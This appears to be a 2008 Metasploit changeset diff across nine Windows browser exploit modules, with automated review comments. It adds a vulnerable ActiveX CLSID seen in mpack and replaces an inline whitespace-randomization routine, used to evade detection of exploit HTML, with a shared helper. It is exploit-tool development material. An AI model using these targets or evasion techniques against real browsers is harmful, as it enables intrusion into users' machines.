Changeset 5496
- Timestamp:
- 04/25/08 00:29:29 (3 weeks ago)
- Files:
-
- framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ie_createobject.rb (modified) (4 diffs)
- framework3/trunk/modules/exploits/windows/browser/ie_iscomponentinstalled.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/kazaa_altnet_heap.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_013_createtextrange.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_055_vml_method.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_057_webview_setslice.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_071_xml_core.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/novelliprint_executerequest.rb (modified) (1 diff)
framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
r4996 r5496 147 147 # 148 148 149 print_status("Attempting to exploit ani_loadimage_chunksize") 149 150 browser = '' 150 151 framework3/trunk/modules/exploits/windows/browser/ie_createobject.rb
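Review bot: The status line added at new line 149 of ani_loadimage_chunksize.rb names the module but not the client, whereas the other browser modules in this changeset log `#{cli.peerhost}:#{cli.peerport}` in their status lines. If the client object is in scope at that point (the enclosing method starts and ends outside the hunk, so this is not visible), `print_status("Attempting to exploit ani_loadimage_chunksize for #{cli.peerhost}:#{cli.peerport}")` would keep the console log consistent. It would also let each logged attempt be matched to a connection when the session record is reviewed afterwards.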
r4645 r5496 49 49 50 50 # Patched 51 [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], 51 [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], 52 # Found in mpack 53 [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ], 52 54 53 55 # Patched … … 59 61 60 62 # Visual Studio components, not marked as safe 61 [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],62 [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],63 [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],64 [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],65 [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],63 [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ], 64 [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ], 65 [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ], 66 [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ], 67 [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], 66 68 67 69 # … … 70 72 71 73 # Not marked as safe 72 [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],74 [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ], 73 75 74 76 # Not marked as safe 75 [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],77 [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ], 76 78 77 79 # Found exploitable in the wild (no details) 78 [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],80 [ 'UNKNOWN - 
Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ], 79 81 80 82 ], … … 219 221 220 222 221 # Randomize the whitespace in the document 222 content.gsub!(/\s+/) do |s| 223 len = rand(100)+2 224 set = "\x09\x20\x0d\x0a" 225 buf = '' 226 227 while (buf.length < len) 228 buf << set[rand(set.length)].chr 229 end 230 231 buf 232 end 233 223 content = Rex::Text.randomize_space(content) 234 224 235 225 print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/ie_iscomponentinstalled.rb
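Review bot: The replacement line `content = Rex::Text.randomize_space(content)` at new line 223 of ie_createobject.rb drops the comment that explained the step, and it rebinds `content` where the removed `content.gsub!` mutated the string in place. The same substitution appears in ie_iscomponentinstalled.rb, kazaa_altnet_heap.rb, ms06_013_createtextrange.rb, ms06_055_vml_method.rb, ms06_057_webview_setslice.rb, ms06_071_xml_core.rb and novelliprint_executerequest.rb. The rebinding is equivalent only if nothing else holds a reference to the original string, which cannot be checked here because the enclosing methods start and end outside the hunks. The helper's definition is not among the files listed in this changeset, so it cannot be confirmed from this page that it keeps the length range and character set of the removed loop; the commit message should reference the revision that introduced it. I would keep a one-line comment above each call, e.g. `# Randomize the whitespace in the document (shared helper in Rex::Text)`.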
r4645 r5496 87 87 | 88 88 89 # Randomize the whitespace in the document 90 content.gsub!(/\s+/) do |s| 91 len = rand(100)+2 92 set = "\x09\x20\x0d\x0a" 93 buf = '' 94 95 while (buf.length < len) 96 buf << set[rand(set.length)].chr 97 end 98 99 buf 100 end 101 89 content = Rex::Text.randomize_space(content) 90 102 91 # Insert the shellcode 103 92 content.gsub!('__pattern__', pattern) framework3/trunk/modules/exploits/windows/browser/kazaa_altnet_heap.rb
r5482 r5496 103 103 "</html>" 104 104 105 # Randomize the whitespace in the document 106 content.gsub!(/\s+/) do |s| 107 len = rand(100)+2 108 set = "\x09\x20\x0d\x0a" 109 buf = '' 110 111 while (buf.length < len) 112 buf << set[rand(set.length)].chr 113 end 114 buf 115 116 end 105 content = Rex::Text.randomize_space(content) 117 106 118 107 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/ms06_013_createtextrange.rb
r4645 r5496 155 155 | 156 156 157 # Randomize the whitespace in the document 158 content.gsub!(/\s+/) do |s| 159 len = rand(100)+2 160 set = "\x09\x20\x0d\x0a" 161 buf = '' 162 163 while (buf.length < len) 164 buf << set[rand(set.length)].chr 165 end 166 167 buf 168 end 157 content = Rex::Text.randomize_space(content) 169 158 170 159 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/ms06_055_vml_method.rb
r4645 r5496 123 123 | 124 124 125 # Randomize the whitespace in the document 126 content.gsub!(/\s+/) do |s| 127 len = rand(100)+2 128 set = "\x09\x20\x0d\x0a" 129 buf = '' 130 131 while (buf.length < len) 132 buf << set[rand(set.length)].chr 133 end 134 135 buf 136 end 137 125 content = Rex::Text.randomize_space(content) 138 126 139 127 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/ms06_057_webview_setslice.rb
r4645 r5496 114 114 | 115 115 116 # Randomize the whitespace in the document 117 content.gsub!(/\s+/) do |s| 118 len = rand(100)+2 119 set = "\x09\x20\x0d\x0a" 120 buf = '' 121 122 while (buf.length < len) 123 buf << set[rand(set.length)].chr 124 end 125 126 buf 127 end 128 116 content = Rex::Text.randomize_space(content) 117 129 118 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") 130 119 framework3/trunk/modules/exploits/windows/browser/ms06_071_xml_core.rb
r5183 r5496 128 128 | 129 129 130 # Randomize the whitespace in the document 131 content.gsub!(/\s+/) do |s| 132 len = rand(100)+2 133 set = "\x09\x20\x0d\x0a" 134 buf = '' 135 136 while (buf.length < len) 137 buf << set[rand(set.length)].chr 138 end 139 140 buf 141 end 130 content = Rex::Text.randomize_space(content) 142 131 143 132 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/novelliprint_executerequest.rb
r5482 r5496 106 106 | 107 107 108 # Randomize the whitespace in the document 109 content.gsub!(/\s+/) do |s| 110 len = rand(100)+2 111 set = "\x09\x20\x0d\x0a" 112 buf = '' 108 content = Rex::Text.randomize_space(content) 113 109 114 while (buf.length < len)115 buf << set[rand(set.length)].chr116 end117 buf118 end119 120 110 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") 121 111
